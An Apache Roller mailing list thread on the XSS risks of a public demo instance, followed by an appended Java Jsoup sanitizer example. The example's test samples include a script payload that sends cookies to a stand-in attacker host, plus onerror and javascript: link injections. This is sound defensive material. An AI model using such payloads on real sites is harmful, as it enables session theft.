I will start with ROL-2150, as I can see some security vulnerabilities associated with JavaScript libraries. As a part of this effort, I intend to create a new Security page for Roller, but I think it should be part of a separate thread. One more thought that came to my mind: we create a separate branch for the demo (synced with the latest stable) with the restrictions suggested by Nitin. Wdyt?
Thanks and regards,
Aditya Sharma

On Wed, 21 Aug 2019 at 19:10, Swapnil M Mane <swapnilmm...@apache.org> wrote:

> Interesting points raised, Dave.
> I am inclined to agree with Nitin and Aditya.
> I feel the demo instance is critical for new adoption since this is always the
> entry point for adopters :-)
>
> As mentioned by Aditya, in OFBiz the inputs of text editors are sanitized.
> Adding to it, in some places of backend screens (which require logging in), no
> sanitization is done, considering the fact that if the user is logged in, it
> means s/he is an authentic user, thus no security vulnerability. [I can
> understand this is not applicable for the demo instance.]
>
> In Kibble, there is not much option available for custom inputs; it takes
> some defined inputs.
>
>
> Best regards,
> Swapnil M Mane,
> www.apache.org
>
> On Tue, Aug 20, 2019 at 11:23 AM Aditya Sharma <iamadityashar...@gmail.com>
> wrote:
>
> > That makes sense.
> > As far as I know OFBiz, input that involves text editors is sanitized.
> > Adding to Nitin's inputs, we can use libraries like Jsoup [1] at the back end
> > to properly sanitize the user's input, and at the front end some advanced
> > editor like Summernote that allows escaping of script execution [2]. If we
> > can make these changes configurable, it won't affect the intrinsic behavior.
> >
> > References:
> > 1. https://jsoup.org/
> > 2. https://summernote.org/deep-dive/#xss-protection-for-codeview
> >
> > Other references that can add to it:
> > https://happycoding.io/tutorials/java-server/sanitizing-user-input
> > https://www.netsparker.com/blog/web-security/cross-site-scripting-xss/
> > https://github.com/Alex-D/Trumbowyg/issues/160
> > https://www.acunetix.com/websitesecurity/cross-site-scripting/
> >
> > Thanks and regards,
> > Aditya Sharma
> >
> > On Tue, 20 Aug 2019 at 01:44, Nitin Lokhande <nitin.lokha...@gmail.com>
> > wrote:
> >
> > > Thoughts I have on this, which might need some more effort too.
> > >
> > > Allowing only alphanumeric characters in blog posts (for publish).
> > > Not providing a publish option and only a preview option (can use a wider
> > > character set).
> > > Creating the db manually and limiting the rights of the user connecting to the db.
> > > Create a read-only demo by limiting the rights of the db user.
> > > No visibility of new posts, and appending a keyword to the blog handle (delete
> > > such blogs every 30 min by some scripts).
> > > All new posts trigger emails to moderators prior to/after publish (include
> > > committers from different regions as moderators for the demo application).
> > > Add captcha for publish as well.
> > >
> > > Thanks,
> > > Nitin
> > >
> > > On Mon, Aug 19, 2019 at 11:47 AM Dave <snoopd...@gmail.com> wrote:
> > >
> > > > I'm not totally opposed to the idea, but there are some security risks to
> > > > be considered.
> > > >
> > > > One of Roller's biggest vulnerabilities is that users are trusted to
> > > > publish any type of content, and this includes JavaScript, which can be
> > > > used to make cross-site scripting and request forgery attacks. You really
> > > > have to trust your bloggers because the system does not sanitize user input
> > > > (except for blog comments). Even if we delete the data every day, bad
> > > > actors could use the system to make these sorts of attacks. We could
> > > > disable custom themes, but folks could still publish malicious code in
> > > > blog posts.
> > > >
> > > > How is that handled for Kibble and OFBiz? Do they sanitize all user input?
> > > >
> > > > Dave
> > > >
> > > > On Mon, Aug 19, 2019 at 9:30 AM Aditya Sharma <adityasha...@apache.org>
> > > > wrote:
> > > >
> > > > > Indeed.
> > > > >
> > > > > +1
> > > > >
> > > > > Thanks and Regards,
> > > > > Aditya Sharma
> > > > >
> > > > > On Sat, 17 Aug 2019 at 18:41, Swapnil M Mane <swapnilmm...@apache.org>
> > > > > wrote:
> > > > >
> > > > > > Hi team,
> > > > > >
> > > > > > New adopters and users are generally looking for a demo instance of
> > > > > > any software to evaluate it.
> > > > > > This brings me a thought: we should have a demo instance for Roller.
> > > > > >
> > > > > > Other Apache projects have also set up demo instances for their
> > > > > > projects, like
> > > > > > Apache Kibble - https://demo.kibble.apache.org/
> > > > > > Apache OFBiz - https://demo-trunk.ofbiz.apache.org/ecommerce/control/main
> > > > > >
> > > > > > The demo instance will be redeployed every day with fresh data and the
> > > > > > latest codebase (we may set up instances for old releases, but it is
> > > > > > not the priority; we can do it later).
> > > > > >
> > > > > > We can request the infra team to set up the demo instance at
> > > > > > https://demo.roller.apache.org/
> > > > > >
> > > > > > Thoughts?
> > > > > > Please let me know if I missed any existing demo instance.
> > > > > >
> > > > > > Best regards,
> > > > > > Swapnil M Mane,
> > > > > > www.apache.org
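Editor's note: the thread above proposes server-side sanitization of blog post bodies with Jsoup, made configurable so the restriction can be switched on for a demo without changing Roller's normal behavior. The class below is an added illustration of that idea and is not code from this thread or from Roller. It assumes jsoup 1.14.1 or later (earlier releases name `Safelist` as `Whitelist`); the class name `DemoPostSanitizer`, the `Mode` enum and the sample payloads in `main` are all constructed for the example.

```java
import org.jsoup.Jsoup;
import org.jsoup.safety.Safelist;

/**
 * Server-side sanitizer for blog post bodies on a demo instance.
 * Hypothetical class written for this example; not part of Roller.
 * Requires jsoup 1.14.1 or later (older releases call Safelist "Whitelist").
 */
public final class DemoPostSanitizer {

    /** Sanitization policy, intended to be chosen from configuration. */
    public enum Mode {
        /** Keep common formatting, links and images; drop everything else. */
        RELAXED_HTML,
        /** Strip all markup; the post is stored as escaped text only. */
        TEXT_ONLY
    }

    // relaxed() allows the usual formatting tags (p, b, i, ul, li, a, img,
    // table ...) but never script, style, iframe, object or on* handlers.
    // Attributes whose value uses a protocol outside the allowed set are
    // dropped, which is what defeats "javascript:" and "data:" URLs.
    private static final Safelist RELAXED = Safelist.relaxed()
            // State the scheme restriction explicitly for the two attributes
            // that matter most on a blog.
            .addProtocols("a", "href", "http", "https")
            .addProtocols("img", "src", "http", "https")
            // A public demo should not hand out link weight to spammers.
            .addEnforcedAttribute("a", "rel", "nofollow");

    // none() keeps text only. Tags are removed and the remaining text is
    // entity-escaped on output, so a literal "<script>" in the post can
    // never be re-interpreted as markup by the browser.
    private static final Safelist TEXT_ONLY = Safelist.none();

    private DemoPostSanitizer() {}

    private static Safelist policyFor(Mode mode) {
        return (mode == Mode.TEXT_ONLY) ? TEXT_ONLY : RELAXED;
    }

    /** Returns a version of the post body that is safe to store and render. */
    public static String sanitize(String untrustedHtml, Mode mode) {
        return Jsoup.clean(untrustedHtml, policyFor(mode));
    }

    /**
     * True if the body already complies with the policy. A false result
     * means the sanitizer would change the content; a demo could use that
     * to hold the post for moderation instead of silently altering it.
     */
    public static boolean isClean(String untrustedHtml, Mode mode) {
        return Jsoup.isValid(untrustedHtml, policyFor(mode));
    }

    public static void main(String[] args) {
        // Constructed samples: one benign post and three typical stored-XSS
        // payloads of the kind a demo blogger could otherwise publish.
        String[] samples = {
            "<p>Hello <b>Roller</b> demo</p>",
            "<p>hi</p><script>new Image().src='https://attacker.example/?c='"
                + "+document.cookie</script>",
            "<img src=\"x\" onerror=\"alert(document.domain)\">",
            "<a href=\"javascript:alert(1)\">click me</a>"
        };
        for (Mode mode : Mode.values()) {
            System.out.println("== " + mode);
            for (String s : samples) {
                System.out.printf("valid=%-5s %s%n    -> %s%n",
                        isClean(s, mode), s, sanitize(s, mode).replace("\n", " "));
            }
        }
    }
}
```

The two-mode split mirrors the options discussed in the thread: `RELAXED_HTML` is the everyday sanitized-editor behavior, while `TEXT_ONLY` is the stricter "publish only plain text" posture suggested for the demo. Running `isClean` before `sanitize` gives the moderation hook as well: anything the policy would alter can be queued for a moderator email rather than published.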